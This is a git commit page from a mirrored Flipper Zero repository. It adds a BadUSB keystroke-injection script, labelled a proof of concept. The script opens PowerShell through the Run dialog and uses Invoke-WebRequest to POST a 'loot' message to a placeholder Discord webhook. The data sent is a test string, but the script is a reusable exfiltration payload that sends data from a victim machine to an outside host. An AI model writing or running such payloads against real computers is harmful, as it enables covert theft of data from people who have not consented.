mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-21 22:10:12 +00:00
Added Discord Webhook Exfil (Vojnomir Malenkov)
This commit is contained in:
parent
8e5a81a373
commit
42bfc64ae5
26
BadUSB/PoC_Discord_Webhook.txt
Normal file
26
BadUSB/PoC_Discord_Webhook.txt
Normal file
@ -0,0 +1,26 @@
|
||||
REM Description: PoC fileless Flipper BadUSB exfil to discord webhook
|
||||
REM Author: Vojnomir Malenkov
|
||||
REM Based on https://github.com/atomiczsec/My-Payloads/blob/main/RubberDucky/payloads/Copy-And-Waste/c.ps1
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING [String]$contentbody = "this is a test of exfil data via webhook"
|
||||
ENTER
|
||||
DELAY 400
|
||||
STRING $Body = @{
|
||||
ENTER
|
||||
DELAY 300
|
||||
STRING 'username'= 'loot'
|
||||
ENTER
|
||||
DELAY 200
|
||||
STRING 'content' = $contentbody }
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING iwr -Uri DISCORD-WEBHOOK-HERE -Method POST -Body $Body
|
||||
DELAY 500
|
||||
ENTER
|
||||
STRING exit
|
||||
DELAY 200
|
||||
ENTER
|
Loading…
Reference in New Issue
Block a user